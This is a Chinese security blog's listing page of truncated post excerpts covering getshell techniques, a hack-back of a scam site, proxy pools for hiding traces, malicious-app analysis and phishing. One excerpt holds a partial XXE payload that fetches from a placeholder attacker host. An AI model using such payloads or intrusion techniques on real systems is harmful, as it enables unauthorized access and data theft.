web安全 第16页

2021-03-24hush阅读(552)赞(0)

前言 朋友说自己服务器巨卡，里边放了一堆项目资料,环境也集成一大堆,身为他bb，义不容辞，必须给他看看，本来以为挺简单的，给杀杀毒，清理一下文件就ok了，没想到搞了挺久，正好写这篇文章记录一下。 清除病毒 问了问朋友有没有下载啥东西，电脑上...

2021-03-23hush阅读(1079)赞(0)

Getshell分为进管理员后台Getshell和不进后台Getshell，本文主要总结常见进后台Getshell和部分。 进后台Getshell 01 管理员后台直接Getshell 管理员后台直接上传Getshell，有时候带密码的We...

2021-03-21hush阅读(511)赞(0)

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建， 开...

2021-03-20hush阅读(927)赞(0)

前言 代理池是渗透测试中常用的工具,用来躲避各种各样的封IP的防火墙,也帮助自身隐藏踪迹。 大部分工具也支持代理选项,但少有支持代理池的.实际上,不需要修改工具去支持代理池,只需要弄一个中间层,在中间层搭建代理池,然后支持代理的工具就可以变...

2021-03-18hush阅读(737)赞(0)

事情是这样的，在某次省hw的时候，对目标进行打点的时候，发现ip下存在四个域名，在一个域名中发现了beifen.zip文件，而网址的功能是一个社区类型的网址。 下载后打开，发现是程序的源码，sql文件都在里面。 找程序中找到的数据库的ip、...

2021-03-15hush阅读(454)赞(0)

确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼，目录扫描，端口扫描，js文件，中间件，指纹识别，反正该上的都上。。。。 随手加个路径，报错了，当看到这个界面我瞬间就有思路了 为什么这么说呢，因为之前我就碰见过这样的网站报错， 这...

2021-03-14hush阅读(547)赞(0)

记录渗透测试中常见的小Tips。 关于XXE漏洞的一些总结 XXE Payload: <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://attacker_ip:port/...

2021-03-13hush阅读(618)赞(0)

开始 接到任务，分析一恶意APP，涉嫌盗取用户通讯录、短信、定位信息，并对中招用户进行勒索。 分析APP 使用AndriodKiller查看了下APP申请的权限 可以看到基本都是敏感度很高的权限，模拟器中打开APP。 APP除了当前能看到的...

2021-03-12hush阅读(1782)赞(0)

在大型企业边界安全做的越来越好的情况下，不管是 APT 攻击还是红蓝对抗演练，钓鱼和水坑攻击被越来越多的应用。 一、邮件安全的三大协议 1.1 SPF SPF 是 Sender Policy Framework 的缩写，中文译为发送方策略框...

2021-03-10hush阅读(494)赞(0)

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建， 开...